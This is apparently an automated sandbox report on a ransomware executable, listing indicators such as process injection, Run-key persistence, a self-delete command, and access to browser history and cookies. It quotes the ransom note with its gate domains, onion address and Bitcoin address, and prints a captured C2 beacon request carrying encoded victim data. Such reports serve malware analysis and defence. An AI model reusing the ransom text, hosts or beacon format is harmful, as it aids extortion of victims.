Submission name: Set-up.exe
Analysis Overview Request Report Deletion
Other submission names
- Set-up install.exe
- Set-up.original.exe
- Set.up.exe
- Setup.exe
- file
Mime:
application/x-dosexec
Operating System:
Windows
Last Anti-Virus Scan:
08/05/2022 00:18:02 [UTC]
Last Sandbox Report:
08/03/2021 12:58:02 [UTC]
malicious
Threat Score: 65/100
Anti-Virus Results Refresh
CrowdStrike Falcon
Downloading data
Static Analysis and ML
08/05/2022 00:18:02 [UTC] |
N/A |
MetaDefender
Submitting file
Multi Scan Analysis
08/05/2022 00:18:02 [UTC] |
VirusTotal
Downloading data
Multi Scan Analysis
08/05/2022 00:18:02 [UTC] |
Related Hashes
Falcon Sandbox Reports
Community
Network Behavior Contacts 2 domains and 2 hosts. View all details Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details. details Wrote 106 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540] details 3/57 Antivirus vendors marked sample as malicious [5% detection rate] sourceExternal Systemrelevance
10/10 details "" allocated 00000088 bytes of
memory in "risjrov.exe" [Protection: "read/write"] details "" wrote 65536 bytes starting with PE header signature to file "%LOCALAPPDATA%\risjrov.exe": 4d5a90000300000004000000ffff0000b8000000000000004000000000000000000000000000000000000000000000000000 ... sourceAPI Callrelevance1/10 details "" wrote 32 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540] details Found the following User-Agents: Mozilla/4.0 [compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR
3.0.04506.648; .NET CLR 3.5.21022] details "All your documents, photos, databases and other important files have been encrypted Private decryption key is stored on a secret Internet server and nobody can Private decryption key is stored on a secret Internet server and nobody can If you see the main
encryptor red window, examine it and follow the instructions. If you have problems with gates, use direct connection: If you see the main encryptor red window, examine it and follow the instructions. Otherwise, it seems that you or your antivirus deleted the encryptor program. Now you have the last chance to decrypt your files. Open in your browser one of the links: //iq3ahijcfeont3xx.fenaow48fn42.com //iq3ahijcfeont3xx.sm4i8smr3f43.com
//iq3ahijcfeont3xx.tor2web.blutmagie.de They are public gates to the secret server. Copy and paste the following Bitcoin address in the input form on server. Avoid missprints. %s Follow the instructions on the server. If you have problems with gates, use direct connection: 1. Download Tor Browser from //torproject.org 2. In the Tor Browser open the //iq3ahijcfeont3xx.onion/ Incident Response
Risk Assessment
Indicators
Wrote 292
instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
Wrote 66 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
Wrote 48 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
Wrote 185 instructions to foreign process
"300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
Wrote 293 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
Wrote 234 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
Wrote 519 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID:
00101562-00001540]
Wrote 98 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
Wrote 12 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540] sourceHybrid Analysis Technologyrelevance8/10
"" allocated 00000088 bytes of memory in "cmd.exe" [Protection: "read/write"] sourceAPI Callrelevance7/10
"" wrote 52 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
"" wrote 4 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
"" wrote 1024 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
"" wrote 234496 bytes to a foreign process
"300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
"" wrote 30208 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
"" wrote 27648 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
"" wrote 512 bytes to a foreign process
"300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
"" wrote 32 bytes to a foreign process "risjrov.exe" [PID: 00001380] sourceAPI Callrelevance6/10
Mozilla/4.0 [compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729] sourceNetwork Trafficrelevance5/10
with strongest encryption RSA-2048 key, generated for this
computer.
decrypt your files until y" [Source: 00113343-00002640-7731F918-128658, Indicator: "decrypt your files"]
"All your documents, photos, databases and other important files have been encrypted
with strongest encryption RSA-2048 key, generated for this computer.
decrypt your files un" [Source: 25712-59-004051C0,
Indicator: "decrypt your files"]
"All your important files are encrypted!" [Source: 25712-918-00406200, Indicator: "files are encrypted"]
"The only copy of the private key, which will allow you to decrypt your files,is located on a secret TOR
server in the Internet; the server will eliminate the key after a time period specified in this window." [Source: 25712-918-00406200, Indicator: "decrypt your files"]
"iles until you pay and obtain the private key.
Otherwise, it seems that you or your antivirus deleted the encryptor program.
Now you have the last chance to decrypt your files.
Open in your browser one of the links:
//iq3ahijcfeont3xx.fenaow48fn42.com
//iq3ahijcfeont3xx.sm4i8smr3f43.com
//iq3ahijcfeont3xx.tor2web.blutmagie.de
They are public gates to the secret server.
Copy and paste the following Bitcoin address in the input form on
server. Avoid missprints.
%s
Follow the instructions on the server.
1. Download Tor Browser from //torproject.org
2. In the Tor Browser open the //iq3ahijcfeont3xx.onion/
Note that this server is available via Tor Browser only.
Retry in 1 hour if site is not reachable.
Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.
%s
Follow the instructi" [Source:
00101562-00001540.00000000.104296.400000.00000040.mdmp, Indicator: "decrypt your files"]
"ur files until you pay and obtain the private key.
Note that this server is available via Tor Browser only.
Retry in 1 hour if site is not reachable.
Copy and paste the following Bitcoin address in the input form on server. Avoid missprints." [Source: 00001540.000001C8.101453.0043B000.wprm, Indicator: "decrypt your files"]
"which will allow you to decrypt your files,is located on a secret TOR" [Source: 00001540.000001C8.101453.0043B000.wprm, Indicator: "decrypt your files"]
"All your documents, photos, databases and other important files have been encrypted
with
strongest encryption RSA-2048 key, generated for this computer.
Private decryption key is stored on a secret Internet server and nobody can
decrypt your files until you pay and obtain the private key.
If you see the main encryptor red window, examine it and follow the instructions.
Otherwise, it seems that you or your antivirus deleted the encryptor program.
Now you have the last chance to decrypt your files.
Open in your browser one of the
links:
//iq3ahijcfeont3xx.fenaow48fn42.com
//iq3ahijcfeont3xx.sm4i8smr3f43.com
//iq3ahijcfeont3xx.tor2web.blutmagie.de
They are public gates to the secret server.
Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.
16gpagzWUuxphi3ZwyjoXdqA5HUZR68mwa
Follow the instructions on the server.
If you have problems with gates, use direct connection:
1. Download Tor Browser from //torproject.org
2. In the"
[Source: 00113343-00002640.00000001.149687.400000.00000040.mdmp, Indicator: "decrypt your files"]
"All your documents, photos, databases and other important files have been encrypted" [Source: HELP_RESTORE_FILES_stosh.TXT.128656, Indicator: "files have been encrypted"]
"Private decryption key is stored on a secret Internet server and nobody can" [Source: HELP_RESTORE_FILES_stosh.TXT.128656, Indicator: "private decryption key"]
details Found dropped filename "RECOVERY_FILE.TXT"
which has been seen in the context of ransomware source
Extracted Filerelevance5/10
- Accesses potentially sensitive information from local browsers
details "risjrov.exe" had access to "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5" [Type: "FileHandle", Context: "NtSetInformationFile"]
"risjrov.exe" had access to "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies\index.dat" [Type: "FileHandle", Context: "NtSetInformationFile"]
"risjrov.exe" had access to "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat" [Type: "FileHandle", Context: "NtSetInformationFile"] sourceTouched Handlerelevance5/10
- Modifies proxy settings
details "" [Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS"]
"" [Access type: "DELETEVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS"]
"risjrov.exe" [Access type: "SETVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYENABLE", Value: "00000000"]
"risjrov.exe" [Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYSERVER"]
"risjrov.exe" [Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYOVERRIDE"]
"risjrov.exe" [Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS"]
"risjrov.exe" [Access type: "DELETEVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS"] sourceRegistry Accessrelevance8/10 -
Queries/modifies the display settings of system associated file extensions
details "" [Access type: "QUERYVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE", Key: "ALWAYSSHOWEXT"]
"" [Access type: "QUERYVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE", Key: "NEVERSHOWEXT"] sourceRegistry Accessrelevance7/10
- Contains native function calls
- Spawns
a lot of processes
details Spawned process "" [Show Process]
Spawned process "" [Show Process]
Spawned process "risjrov.exe" [Show Process]
Spawned process "risjrov.exe" [Show Process]
Spawned process "cmd.exe" with commandline "/c del C:\300DE5~1 >> NUL" [Show Process] sourceMonitored Targetrelevance8/10
- Anti-Detection/Stealthyness
- Sets the process error mode to suppress error box
details "" set its error mode to SEM_NOOPENFILEERRORBOX
"risjrov.exe" set its error mode to SEM_NOOPENFILEERRORBOX sourceAPI Callrelevance8/10
- Sets the process error mode to suppress error box
- Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler [often used as anti-debugging trick]
details from PID 00001220
from PID 00001220
from PID 00001220
from 300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b [PID: 1220] [Show Stream]
from PID 00001220
from PID 00001220
from PID 00001540
from PID 00001540
from PID 00001540
from PID 00001540 sourceHybrid Analysis Technologyrelevance1/10
-
Contains ability to register a top-level exception handler [often used as anti-debugging trick]
- Environment Awareness
- Contains ability to query the machine version
-
Possibly tries to detect the presence of a debugger
details from PID 00001540
from PID 00001540
from PID 00002640
from PID 00002640 sourceHybrid Analysis Technologyrelevance1/10 - Possibly tries to implement anti-virtualization techniques
details "AdSv - vmsrvc.sys - Virtual Machines Additions Service" [Indicator: "vmsrvc"] sourceStringrelevance4/10
- Reads the cryptographic machine GUID
details "risjrov.exe" [Path: "\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\CRYPTOGRAPHY", Key: "MACHINEGUID"] sourceRegistry Accessrelevance10/10
- General
-
Reads configuration files
details "" read file "C:\Windows\win.ini"
"" read file "%USERPROFILE%\Desktop\desktop.ini"
"risjrov.exe" read file "C:\Windows\win.ini"
"risjrov.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini" sourceAPI Callrelevance4/10
-
Reads configuration files
- Installation/Persistance
- Drops executable files
details "risjrov.exe" has type "PE32 executable [GUI] Intel 80386, for MS Windows" sourceExtracted Filerelevance10/10
- Modifies auto-execute functionality
by setting a value in the registry
details "risjrov.exe" [Access type: "CREATE", Path: "\REGISTRY\MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS"]
"risjrov.exe" [Access type: "CREATE", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"]
"risjrov.exe" [Access type: "SETVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN", Key: "MSCONFIG", Value: "%LOCALAPPDATA%\risjrov.exe"]
"risjrov.exe" [Access type: "CREATE", Path: "\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"]
"risjrov.exe" [Access type: "SETVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN", Key: "MSCONFIG", Value: "C:\Users\%USERNAME%\AppData\Local\risjrov.exe"] source Registry Accessrelevance8/10
- Drops executable files
- Network Related
- Found potential IP address in binary/memory
details "85.25.146.22" sourceStringrelevance3/10
- Found potential URL in binary/memory
details "//ipinfo.io/ip"
"//iq3ahijcfeont3xx.fenaow48fn42.com/?enc=%s"
"//iq3ahijcfeont3xx.sm4i8smr3f43.com"
"//www.torproject.org/projects/torbrowser.html.en"
"//iq3ahijcfeont3xx.tor2web.blutmagie.de" sourceStringrelevance2/10
- Found potential IP address in binary/memory
- Spyware/Information Retrieval
-
Contains ability to enumerate processes/modules/threads
details at 00113343-00002640-773301AA-121019
at 00113343-00002640-773301AA-121035
from PID 00002640
from risjrov.exe [PID: 2640] [Show Stream] sourceHybrid Analysis Technologyrelevance5/10 - Contains ability to open the clipboard
-
Contains ability to enumerate processes/modules/threads
- System Destruction
-
Marks file for deletion
details "%LOCALAPPDATA%\risjrov.exe" marked "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ip[1].txt" for deletion
"C:\Users\%USERNAME%\AppData\Local\risjrov.exe" marked "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ping[1].htm" for deletion sourceAPI Callrelevance10/10 - Opens
file with deletion access rights
details "risjrov.exe" opened "C:\MSOCache\All Users\{90120000-006E-0407-0000-0000000FF1CE}-C\Microsoft.VC80.CRT.manifest" with delete access
"risjrov.exe" opened "%PROGRAMFILES%\Application Verifier [x64]\REDIST.TXT" with delete access
"risjrov.exe" opened "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ip[1].txt" with delete access
"risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\dml.doc" with delete access
"risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\kernel_debugging_tutorial.doc" with delete access
"risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\license.txt" with delete access
"risjrov.exe" opened "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ping[1].htm" with delete access
"risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\redist.txt" with delete access
"risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\relnotes.txt" with delete access
"risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\sdk\samples\extcpp\readme.txt" with delete access sourceAPI Callrelevance7/10
-
Marks file for deletion
- System Security
-
Adjusts debug privileges
details "" adjusted SE_DEBUG_PRIVILEGE
"risjrov.exe" adjusted SE_DEBUG_PRIVILEGE sourceAPI Callrelevance3/10
-
Adjusts debug privileges
- Unusual Characteristics
- Imports suspicious APIs
details GetThreadContext
CreateProcessW
LoadLibraryW
GetModuleFileNameW
GetProcAddress
VirtualAllocEx
WriteProcessMemory
GetModuleHandleW
GetCommandLineA
GetStartupInfoW
TerminateProcess
UnhandledExceptionFilter
IsDebuggerPresent
WriteFile
GetModuleFileNameA
GetTickCount
Sleep sourceStatic Parserrelevance1/10 -
Reads information about supported languages
details "risjrov.exe" [Path: "\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE", Key: "00000407"]
"cmd.exe" [Path: "\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE", Key: "00000407"] sourceRegistry Accessrelevance3/10
- Imports suspicious APIs
- Hiding 12 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
- Environment Awareness
-
Contains ability to query machine time
details from PID 00001220
from 300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b [PID: 1220] [Show Stream]
from PID 00001540
from PID 00001540
from PID 00001540
from PID 00001540
from PID 00001540
from PID 00001540
from PID 00001380
from risjrov.exe [PID: 1380] [Show Stream] sourceHybrid Analysis Technologyrelevance1/10
-
Contains ability to query machine time
- General
-
Contacts domains
details "ipinfo.io"
"24u4jf7s4regu6hn.fenaow48fn42.com" sourceNetwork Trafficrelevance1/10 -
Contacts server
details "54.93.61.143"
"104.27.142.176" sourceNetwork Trafficrelevance1/10 -
Creates mutants
details "Local\ZonesCounterMutex"
"Local\ZoneAttributeCacheCounterMutex"
"Local\ZonesCacheCounterMutex"
"Local\ZonesLockedCacheCounterMutex"
"Local\_!MSFTHISTORY!_"
"Local\c:!users!pspubws!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
"Local\c:!users!pspubws!appdata!roaming!microsoft!windows!cookies!"
"Local\c:!users!pspubws!appdata!local!microsoft!windows!history!history.ie5!"
"Local\WininetStartupMutex"
"Local\WininetConnectionMutex" sourceCreated Mutantrelevance3/10 -
GETs files from a webserver
details "GET /ip HTTP/1.1
User-Agent: Mozilla/4.0 [compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022]
Host: ipinfo.io"
"GET /ping.php?U3ViamVjdD1QaW5nJmtleT02MzY3QkVENTYwMDBBNjBCMkYyQzhBNzJGRkNDNEU0ODA5NTY2MDY4QTczQTc0RDAwRjk4QzcxNThENzVBOEM1JmFkZHI9MTZncGFneldVdXhwaGkzWnd5am9YZHFBNUhVWlI2OG13YSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuNC4wYSZPUz03NjAxJklEPTg4JnN1YmlkPTAmZ2F0ZT1HMCZpc19hZG1pbj0xJmlzXzY0PTEmaXA9ODUuMjUuMTQ2LjIy HTTP/1.1
User-Agent: Mozilla/4.0 [compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729]
Host: 24u4jf7s4regu6hn.fenaow48fn42.com
Connection: Keep-Alive" sourceNetwork Trafficrelevance5/10 - Loads modules at runtime
details "" loaded module "%WINDIR%\SYSTEM32\APPHELP.DLL" at base 747F0000
"" loaded module "PROPSYS.DLL" at base 74630000
"" loaded module "OLE32.DLL" at base 75250000
"" loaded module "COMCTL32.DLL" at base 74B40000
"" loaded module "OLEAUT32.DLL" at base 76CA0000
"" loaded module "ADVAPI32.DLL" at base 75A10000
"" loaded module "SHELL32.DLL" at base 75F50000
"" loaded module "C:\WINDOWS\SYSTEM32\PROPSYS.DLL" at base 74630000
"" loaded module "NTMARTA.DLL" at base 745C0000 sourceAPI Callrelevance1/10 -
Looks up procedures from modules [excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime]
details ""
""
""
""
""
""
""
""
""
"" sourceAPI Callrelevance1/10 -
Runs shell commands
details "/c del C:\300DE5~1 >> NUL" on 2015-05-14.17:06:09 sourceMonitored Targetrelevance5/10
-
Contacts domains
-
Installation/Persistance
- Contains ability to lookup the windows account name
details at 00101562-00001540-773301AA-115708
at 00113343-00002640-773301AA-133152 sourceHybrid Analysis Technologyrelevance5/10 - Dropped files
details "risjrov.exe" has type "PE32 executable [GUI] Intel 80386, for MS Windows"
"storage.bin" has type "data"
"RECOVERY_FILE.TXT" has type "ASCII text, with CRLF line terminators"
"log.html" has type "HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators"
"HELP_RESTORE_FILES_stosh.TXT" has type "ASCII text, with CRLF line terminators"
"Microsoft.VC80.CRT.manifest" has type "XML document text"
"REDIST.TXT" has type "data"
"ip[1].txt" has type "ASCII text"
"dml.doc" has type "Composite Document File V2 Document, Little Endian, O%WINDIR%\ Version 6.0, Code page: 1252, Title: Debugger Markup, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Fri Sep 21 08:00:00 2007, Create Time/Date: Sat Sep 22 00:03:00 2007, Last Saved Time/Date: Sat Sep 22 00:03:00 2007, Number of Pages: 11, Number of Words: 3195, Number of Characters: 16588, Security: 0"
"kernel_debugging_tutorial.doc" has type "Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Kernel Debugging with WinDbg Tutorial, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:25:00 2007, Last Saved Time/Date: Tue Sep 25 21:25:00 2007, Number of Pages: 64, Number of Words: 13581, Number of Characters: 75240, Security: 0" sourceExtracted Filerelevance3/10
- Contains ability to lookup the windows account name
File Details
All Details:
hfxtnsu.exe
Filenamehfxtnsu.exeSize375KiB [383488 bytes]Typepeexe executableDescriptionPE32 executable [GUI] Intel 80386, for MS WindowsArchitecture WINDOWSSHA256300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b
Visualization
Input File [PortEx]Classification [TrID]
- 67.3% [.EXE] Win32 Executable MS Visual C++ [generic]
- 14.2% [.DLL] Win32 Dynamic Link Library [generic]
- 9.7% [.EXE] Win32 Executable [generic]
- 4.3% [.EXE] Generic Win/DOS Executable
- 4.3% [.EXE] DOS Executable Generic
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 5 processes in total.
Network Analysis
DNS Requests
HTTP Traffic
Extracted Files
Displaying 32 extracted file[s]. The remaining 251 file[s] are available in the full version and XML/JSON reports.
- HELP_RESTORE_FILES_stosh.TXT
- Microsoft.VC80.CRT.manifest
- REDIST.TXT
- dml.doc
Size111KiB [113900 bytes]TypeComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Debugger Markup, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Fri Sep 21 08:00:00 2007, Create Time/Date: Sat Sep 22 00:03:00 2007, Last Saved Time/Date: Sat Sep 22 00:03:00 2007, Number of Pages: 11, Number of Words: 3195, Number of Characters: 16588, Security: 0MD5 9759d0d191d542f59b657e5d308094bb SHA1 04b43ba5b5add678ac7fbb1ca687b8c39e4bc666 SHA256 d31f8885d924b3a5928b260b05f60f1afa4993e9f400950c7f3df9dfd2164f70
- kernel_debugging_tutorial.doc
Size2.3MiB [2392300 bytes]TypeComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Kernel Debugging with WinDbg Tutorial, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:25:00 2007, Last Saved Time/Date: Tue Sep 25 21:25:00 2007, Number of Pages: 64, Number of Words: 13581, Number of Characters: 75240, Security: 0MD5 83e4a132a62e1a2fe3bbcc088681979d SHA1 a01140b6c34571c48db54e3bb0887acabbb60760 SHA256 a91fd55fc64f0678ca6ecfbd409e1172cbc3536722335d52516ca554673942cb
- license.txt
- relnotes.txt
- readme.txt
-
srcsrv.doc
Size217KiB [222444 bytes]TypeComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Source Server, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Sat Jun 17 20:09:00 2006, Create Time/Date: Tue Sep 25 21:45:00 2007, Last Saved Time/Date: Thu Mar 20 22:48:00 2008, Number of Pages: 19, Number of Words: 6614, Number of Characters: 37706, Security: 0MD5 a7600489849fbeacc95d06ac70756d5c SHA1 5cd7934d2a3b1c6628d2c407dd2c2f674b2bbe1d SHA256 2bb9bec411d1e87d1d150e9b01bc919ac5d7bd415ebbd9b49652930bd1051651
- symhttp.doc
Size542KiB [555244 bytes]TypeComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: HTTP Symbol Stores and the Symbol Server Proxy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:49:00 2007, Last Saved Time/Date: Tue Sep 25 21:49:00 2007, Number of Pages: 19, Number of Words: 4139, Number of Characters: 21611, Security: 0MD5 246be13e750d0023f720e9b449226f44 SHA1 719632fe06de246a473d0e2ce19af3da7aca9aea SHA256 06c9ad0a058a1f52d21b8d69b4cb7d4a72618d6bb5e08d54e0522c18317ee136
- themes.doc
Size1.1MiB [1102060 bytes]TypeComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: WinDbg Themes, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:04:00 2007, Last Saved Time/Date: Tue Sep 25 21:04:00 2007, Number of Pages: 6, Number of Words: 491, Number of Characters: 2780, Security: 0MD5 4344b6b0cad35480dea522d4329a00af SHA1 2a828e437afba57f61d4a9abcc8d5f7a91079983 SHA256 f78f42c7c94f836631168213696575b9cff3902df7dc1acf4bfa69d8a6055e04
- pooltag.txt
- Mso Example Intl Setup File A.txt
- Mso Example Intl Setup File B.txt
- Mso Example Setup File A.txt
- troubleshootingtest.psd1
- sign.js
-
fxref_Microsoft.JScript.Vsa.hxs
Size301KiB [307832 bytes]
-
fxref_Microsoft.SqlServer.Server.hxs
Size1.2MiB [1213326 bytes]
-
fxref_System.Data.Linq.Mapping.hxs
Size985KiB [1008588 bytes]
- sample.docx
-
omniprov.doc
Size306KiB [313580 bytes]
- DbgSpec.doc
- testEE.cer
- contoso.cer
- contosoroot.cer
- TestCertificate.cer
-
MigratingToAeroWizards.doc
Size832KiB [852204 bytes]
-
IFileIsInUse_sample.docx
Size385KiB [393914 bytes]
-
Using the System Folder View.doc
Size519KiB [531692 bytes]
- risjrov.exe
- storage.bin
Notifications
- Not all strings are visible in the report, because the maximum number of strings was reached [5000]
- Parsed more than maximum number of dropped files [20], report might not contain information about some dropped files
- Some API calls are hidden from the report due to oversize